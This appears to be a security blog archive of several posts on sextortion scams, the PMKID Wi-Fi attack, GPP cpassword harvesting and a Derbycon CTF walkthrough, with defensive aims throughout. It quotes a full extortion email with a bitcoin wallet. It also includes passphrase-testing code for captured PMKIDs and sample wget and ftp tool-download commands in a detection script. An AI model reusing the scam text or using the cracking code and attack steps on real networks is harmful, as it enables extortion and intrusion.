Category: Securityexploits

Have you received an email, in broken English, saying your password has been stolen?

Subject: "Security Notice. Someone have access to you system"
As you may have noticed, I sent you an email from your account.
This means that I have full access to your acc: On moment of crack (youremail@youremaildomain.com) password: jfwqu6qoizxahofj0qkw
You say: this is my, but old password!
Or: I will change my password at any time!
Of course! You will be right,
but the fact is that when you change the password, my malicious code every time saved a new one!
I've been watching you for a few months now.
But the fact is that you were infected with malware through an adult site that you visited.
If you are not familiar with this, I will explain.
Trojan Virus gives me full access and control over a computer or other device.
This means that I can see everything on your screen, turn on the camera and microphone, but you do not know about it.
I also have access to all your contacts and all your correspondence from e-mail and messangers.
Why your antivirus did not detect my malware?
Answer: My malware uses the driver, I update its signatures every 4 hours so that your antivirus is silent.
I made a video showing how you satisfy yourself in the left half of the screen, and in the right half you see the video that you watched.
With one click of the mouse, I can send this video to all your emails and contacts on social networks. I can also post access to all your e-mail correspondence and messengers that you use.
If you want to prevent this, transfer the amount of $770 to my bitcoin address (if you do not know how to do this, write to Google: "Buy Bitcoin").
My bitcoin address (BTC Wallet) is: 1MrUDSrZiqD3ijxsBUPt2SukoFy534orP2
After receiving the payment, I will delete the video and you will never hear me again.
I give you 48 hours to pay.
I have a notice reading this letter, and the timer will work when you see this letter.
Filing a complaint somewhere does not make sense because this email cannot be tracked like my bitcoin address.
I do not make any mistakes.

—————————————————–

So this trickster extortionist actually makes several mistakes (besides the spelling errors).

First of all, the email says “As you may have noticed, I sent you an email from your account.” There is a basic issue with this statement: all email can be ‘spoofed’, which is what makes this a form of spam. Spoofed means the text in the ‘From:’ field means nothing; it can be changed to whatever the spammer wants it to look like. (In fact you can change your own From field as an experiment if you choose.)

So if your email is “youremail@emaildomain.com” then the spammer can make the message look like it came from that address.

The other problem the sextortionist has is that they have to assume there is a video camera on the computer.

What if there is no video camera on the computer? Then how can the video sextortion work?

So the scammer makes several assumptions:

you don’t know about From spoofing

you will ignore the misspellings and bad grammar

the email owner visited porn sites

the email owner has a functioning video camera on the computer

the password included in the email was at one time a real password

the email owner knows enough about bitcoin, or can learn, to transfer money into bitcoin

Those are a lot of assumptions, and on top of that the scammer is leaving an electronic trail in Bitcoin, or at least in how they access bitcoin (we will not go into detail of how this is done). That trail is visible to experienced investigators, which is why you should go to the bitcoinabuse website and file a report (link below).

One thing people should do is see how many others this has happened to and decide what to do from there; the Internet Storm Center also had one of these (i.e. google or startpage.com a portion of the email and see what comes up).

What did I do, you may ask? Of course you NEVER pay the extortionist. But one can also help fellow Internet denizens reduce this type of email: go to the Bitcoin Abuse website.

Go to the website and file a report with the bitcoin address included in the email, so that law enforcement and other people who track and try to find these spammers can start to do something about it.

Or you can view a report for the bitcoin address to see how many others this email has gone to. Check the FAQ on bitcoinabuse.com.

So the short story is that the scammers have accumulated a lot of money in hundreds (434) of Bitcoin addresses, and have slowly started to move the money into a few addresses, as much as $21.5mil plus $18.5mil. From there the bitcoin will be “mixed” using bestmixer.io, so that experts like those in the link above will not be able to tell where the money goes (anonymity).

So again, please do not pay these scammers if you receive an email like the one included in this blog.

This attack does not even need a full EAPOL 4-way handshake. EAPOL stands for Extensible Authentication Protocol (EAP) over LAN. A simple 4-way handshake is shown pictorially below (from hitchhikersguidetolearning.com).

This means that in the past an attack on Wi-Fi would need the EAPOL 4-way handshake to be captured, and capturing the 4-way handshake is sometimes difficult to achieve.

Instead, in this attack: “We receive all the data we need in the first EAPOL frame from the AP.”

First, one captures a sample initial message from the ‘Authenticator’, which includes a PMKID (run hcxdumptool).

Second, run hcxpcaptool to convert the captured data from pcapng format into a hash format accepted by hashcat.

Third, run hashcat to crack the string of data.
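As an added illustration (not code from the hashcat post or from the hcx tools), here is the derivation that makes the first EAPOL frame sufficient: a defender holding a hashcat mode 16800 style line (PMKID*MAC_AP*MAC_STA*ESSID, hex fields) from their own network can confirm which passphrase it validates, and see that checking one candidate costs a single PBKDF2 run plus one HMAC, which is why WPA2-PSK protection rests entirely on passphrase length and randomness. The SSID, passphrase and MAC addresses below are constructed values.

```python
import hashlib
import hmac

# Added illustration (not from the hashcat post): a PMKID from the first EAPOL
# frame can be recomputed from a passphrase guess, with no 4-way handshake at all.


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA): first 16 bytes."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def parse_16800_line(line: str):
    """Split a hashcat mode 16800 line, PMKID*MAC_AP*MAC_STA*ESSID (every field hex)."""
    pmkid_hex, ap_hex, sta_hex, essid_hex = line.strip().split("*")
    return (bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex),
            bytes.fromhex(sta_hex), bytes.fromhex(essid_hex).decode())


def passphrase_matches(line: str, passphrase: str) -> bool:
    """True when this passphrase reproduces the PMKID recorded in the line."""
    pmkid, ap_mac, sta_mac, essid = parse_16800_line(line)
    candidate = compute_pmkid(derive_pmk(passphrase, essid), ap_mac, sta_mac)
    return hmac.compare_digest(candidate, pmkid)


def make_sample_line(passphrase: str, essid: str, ap_mac: bytes, sta_mac: bytes) -> str:
    """Build a constructed 16800-style line for a network we own (test data, not a capture)."""
    pmkid = compute_pmkid(derive_pmk(passphrase, essid), ap_mac, sta_mac)
    return "*".join([pmkid.hex(), ap_mac.hex(), sta_mac.hex(), essid.encode().hex()])


if __name__ == "__main__":
    # Constructed values: hypothetical SSID, passphrase and MAC addresses.
    sample = make_sample_line("correct horse battery", "ExampleNet",
                              bytes.fromhex("4604ba734d4e"), bytes.fromhex("89acf0e761f4"))
    print(sample)
    print(passphrase_matches(sample, "correct horse battery"))  # True
    print(passphrase_matches(sample, "password123"))           # False
```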

So now no 4-way handshake is needed, only the expertise to run a couple of scripts and to know how to set up the Wi-Fi capture using the Wi-Fi network card.

The comments on the hashcat webpage do mention that your Wi-Fi network card must be capable of capturing wlan traffic.

Like this:

We as cybersecurity practitioners must use the best tools we can find. So if AI (Artificial Intelligence) can help us, we need to use it.

Of course we have to use real AI tools, not old tools renamed “AI” to sell more software for a little while.

What is the definition of AI? Machine software (i.e. with no human modification) that imitates human behavior. Or: a branch of computer science dealing with the simulation of intelligent behavior in computers.

So true AI cybersecurity is a program running an attack or a defense for the network or computer without human interaction.

What in today’s environment shows small glimpses of intelligence? Bots and viruses, of course.

It is also my opinion that future AI will first come as more sophisticated “bots” or infectious software:

What makes this vulnerability bad is that it is a remote code execution vulnerability. “Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.” (from the NIST link).

So if an AI program can program itself to infect and take over other machines, both to infect further machines and to perform other goals (like mining cryptocurrencies, the latest action seen with this exploit, for example), then it is easily done when people find ways not to patch their software.

Image example of CVE-2017-10271 as it was found

The key is to patch your machines, and we have to develop “Blue team” AI first in this coming “AI war”.

To be a bit clearer (as clear as mud, I am sure): someone programs an attack program to do the 3 things mentioned:

Find vulnerability

Exploit the vulnerability and make money with cryptocurrencies on your machines.

Propagate the program as much as possible

So the future in AI (the real scary part) is when a truly non-human, fully automated attack program does all 3 items and improves itself. How dangerously it will act is still not fully realized, i.e. we are not sure how bad it will get.

The important piece of this puzzle is the exponential level of improvement a fully electronic AI could achieve.

Some people have talked about the ‘singularity’ moment, when an AI will have more capabilities than a human brain (supposedly sometime in the 2020s).

What about a cybersecurity ‘singularity’ moment? When an improving attack program starts to improve so fast that it morphs into something that is difficult to stop.

The problems solved in our TV shows, the ones apparently remembered along with their ‘calls for action’, are the ones solved by individuals.

So maybe after a lifetime of watching these shows we have a predisposed, subconscious notion that 1 person can solve most problems in a reasonable amount of time (1 hour or 2 hours).

So when a complex issue is placed in front of us, such as Red vs Blue teams (attackers vs defenders), where a series of steps breaches a server and then more tools are used to keep access to the system without the defending team’s knowledge, the solution is not obvious.

So why am I beating this horse again? Because the principle will not go away. The attackers will find ways to use the systems we have against us.

For example, we want to defend our SQL servers, maybe by hiding them. But this will not work, as there are tools to ask our systems “what are the SQL servers?” and our computers dutifully answer the request.

Technical example: Do you have a domain controller? It is automatically running Active Directory, the program that runs your network and your username and password authentication.

Then how do you defend against a user asking your DC (Domain Controller) various questions with some commands?

You can access PowerShell from a command line and then ask various questions (execute commands) like get-service or get-process to find out what services and processes are running on the system.

Why is this important? Because you can pick a service running on the system and then try to see which users have access to this service with another tool, PowerMemory for example (as the tool (RWMC) in this article is no longer supported).

Let’s say that you got the user to click on phishing malware and now a command line shell has been opened that connects back to one of the Command and Control servers. techtarget.com explains this phenomenon.

Once the hacker has a command line open (however they did it), they will try to get more access by obtaining the passwords for administrator accounts.

The credentials can be taken from .xml files on any Windows system. If the system is in a domain, it will have local user accounts plus whoever has logged into that particular system.

All domain Group Policies are stored here: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

So the hacker knows where to look and what to find: the .xml files with the cpassword variable, which holds the password in an encrypted format.

So now it only depends on how strong your password is…

What are your password policy characteristics? Do you require long passwords, more than 14 characters? Because if you have fewer than 14 characters the hackers will have an even easier time getting your passwords.
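An added audit script (not from this article or any tool it names): walk a copy of the SYSVOL Policies tree described above and report every Group Policy Preferences XML element that still carries a cpassword attribute, so the entries can be removed rather than relied upon, since the key Microsoft used for cpassword is publicly documented. The sample XML, clsid values, cpassword value and GPO folder name are constructed placeholders.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Added audit script (not from the article): walk a SYSVOL Policies tree and report
# every Group Policy Preferences XML element that still carries a cpassword attribute.
# Constructed sample modelled on a Groups.xml item; clsid and cpassword are placeholders.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{CLSID-PLACEHOLDER}">
  <User clsid="{CLSID-PLACEHOLDER}" name="LocalAdmin" image="2">
    <Properties action="U" userName="LocalAdmin" cpassword="PLACEHOLDER_CPASSWORD" noChange="1"/>
  </User>
</Groups>
"""
# A preference file with no stored credential, to show it is not reported.
SAMPLE_CLEAN_XML = """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{CLSID-PLACEHOLDER}">
  <Task name="Cleanup"><Properties action="C" appName="cleanup.exe" runAs="SYSTEM"/></Task>
</ScheduledTasks>
"""


def find_cpassword_entries(policies_root: str) -> list:
    """Return (relative path, tag, userName) for each element carrying a cpassword attribute."""
    findings = []
    for dirpath, _dirs, files in os.walk(policies_root):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # unreadable XML: skip it rather than abort the whole audit
            for elem in tree.iter():
                if "cpassword" in elem.attrib:
                    rel = os.path.relpath(path, policies_root).replace(os.sep, "/")
                    findings.append((rel, elem.tag, elem.attrib.get("userName", "")))
    return findings


def demo() -> list:
    """Build a constructed Policies tree in a temp dir (placeholder GPO GUID) and audit it."""
    with tempfile.TemporaryDirectory() as root:
        prefs = os.path.join(root, "{GPO-GUID-PLACEHOLDER}", "Machine", "Preferences")
        for sub, xml in (("Groups", SAMPLE_GROUPS_XML), ("ScheduledTasks", SAMPLE_CLEAN_XML)):
            os.makedirs(os.path.join(prefs, sub))
            with open(os.path.join(prefs, sub, sub + ".xml"), "w") as fh:
                fh.write(xml)
        return find_cpassword_entries(root)
```

Against a real tree, mount the share read-only and pass its Policies directory to find_cpassword_entries; demo() only exercises the constructed sample.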

So is it still easy? Can you depend only on your defense team (Blue team) to keep all of your assets free of unauthorized access? It will take more than a single episode, or a season of episodes. It will take a marathon of binge watching to keep the hackers away. It will take red teams (ethical hackers) to attack.

We can help you with a plan of security policies and red team attacks.

I have been watching the Derbycon videos (put up by IronGeek) and I like Paul Coggin’s comment: Are you worried about zero-day attacks? You have to take care of the 80-day ones first.

I have heard Paul’s talks before, and this one at Derbycon is a bit different, but the theme is the same: do not forget the OSI layer 2 exploits and threats. This means that Cisco devices can be attacked if not configured properly. This is obvious to him, as he is a pentester who tests Cisco routers.

Kind of funny, as Paul says (as a side note): “many companies are worried about Zero Day attacks but have not solved the 80 day attack”.

It is a valid point, Paul: if we do not have our patching process set up correctly we are not catching the 80-day-old vulnerability, not to mention the zero-day (we can’t catch that one). But it is important to note that we should not focus on the zero-day vulnerability, since there is nothing to do about those.

Derbycon had a CTF (capture the flag) competition as well, which means there was a contest with a real-life hacker’s riddle … and a solution that shows you some of the thought processes a hacker goes through when taking over a machine.

At Derbycon’s CTF event the test hack uses the same process a criminal hacker would use in the real world.

“Hacker Process”: also called a Kill Chain: Recon, Analysis, Penetrate, Control. We like to call it SVAPE&C.

Walking through the thought processes of the hacker as they perform their actions is important for designing better defenses.

The red team (attackers) versus the blue team (defense) is the constant in the world of computer security, hence these CTF contests.

I don’t want to get into too many details, but a few are necessary:

In a capture the flag contest there is a lot of network traffic that the hacker (red team) has to digest and make sense of: decide what traffic is useful and which system to review more closely.

The system HELPDESK was found (with Wireshark traffic sniffing), and the nmap scanner showed ports 139/tcp and 3456/tcp open (Microsoft share ports).

Then an nbtscan was done to find out more information about the system.

Then a ping was done, which also gives out information.

Port 139 was Microsoft.

Port 3456 was odd, so ncat was run to probe the port.

Here came the CTF oddity: the response was just like the “War Games” movie in the 90’s: “WOULD YOU LIKE TO PLAY A GAME?”

From here the hack is in a different stage, having done reconnaissance and found the system and its open ports.

So as you see in the Tweet, the next point was to give a programmatic response to port 3456 (even the port number is funny, as there is no port service with that name). As a hacker participating in the CTF, once you saw that tweet you knew what to answer to the question.

The issue now was how to penetrate the box.

The str$() response did not work correctly

Hackers do what they do, and “hack”, i.e. try different things until succeeding.

Through some tricks they were able to start a command.com DOS command shell (after realizing this may be an old machine on which the new hack tools do not work).

Once the hacker can execute commands on the remote system what happens next? It is the “control” piece.

Now the hacker downloads the hacking tools needed to truly control the machine (ncat and a registry program).

From there they had to find the FlagMalwareBytes registry flag in the time allotted.

This particular team placed 3rd.

There is more to the CTF event, but at this point I want to discuss the general nature of hacking. It is true that in this case the hacker was trying to control an ancient machine (Windows 98, or even 95), but the principles are the same. In fact, due to the nature of the old machines, the hackers had to use older tools.

The one lesson we need to take away (no matter the system) is that most attack hacks try to download tools and other items to the system being compromised. And it usually will be with manual commands, ftp or wget.

So if you can review any manual tool commands running in your network, that would be good. Patching the local systems against all vulnerabilities gives you more defense against wily hackers.
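As an added example of the review suggested above (not code from this blog), the check below runs over process-creation events and flags the transfer tools the post names, ftp and wget, whenever they reach a host that is not on your own software-distribution allow-list. The events, the allow-list host and the 203.0.113.x addresses (a documentation range) are constructed, not real telemetry.

```python
import re

# Added example (not from the article): review process command lines for the manual
# transfer tools the article names (ftp, wget) reaching hosts outside an allow-list.
DOWNLOAD_TOOLS = {"ftp", "wget"}
# Hosts your own software distribution legitimately uses (assumed/constructed).
ALLOWED_HOSTS = {"downloads.example.com"}

URL_HOST = re.compile(r"(?:https?|ftp)://([^/\s:]+)", re.IGNORECASE)
BARE_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed process-creation events: (host, user, command line). Not real telemetry.
SAMPLE_EVENTS = [
    ("helpdesk01", "svc_kiosk", r"wget http://203.0.113.5/tools.zip -O C:\Temp\tools.zip"),
    ("build02", "jenkins", "wget https://downloads.example.com/openjdk.tar.gz"),
    ("helpdesk01", "svc_kiosk", r"ftp -s:C:\Temp\get.txt 203.0.113.5"),
    ("ws17", "alice", r"C:\Windows\notepad.exe report.txt"),
]


def tool_name(command_line: str) -> str:
    """Basename of the first token, lower-cased, without a trailing .exe."""
    first = command_line.strip().split()[0]
    base = re.split(r"[\\/]", first)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


def remote_hosts(command_line: str) -> set:
    """Hosts named in URLs plus bare IPv4 addresses anywhere on the command line."""
    return set(URL_HOST.findall(command_line)) | set(BARE_IPV4.findall(command_line))


def review_events(events, allowed=ALLOWED_HOSTS) -> list:
    """Return the events where a download tool reaches a host not on the allow-list.

    A download tool with no recognisable host is also flagged, since it cannot be
    shown to be a sanctioned distribution fetch."""
    flagged = []
    for host, user, cmd in events:
        tool = tool_name(cmd)
        if tool not in DOWNLOAD_TOOLS:
            continue
        targets = remote_hosts(cmd)
        if not targets or any(t not in allowed for t in targets):
            flagged.append({"host": host, "user": user, "tool": tool, "targets": sorted(targets)})
    return flagged


if __name__ == "__main__":
    for finding in review_events(SAMPLE_EVENTS):
        print(finding)
```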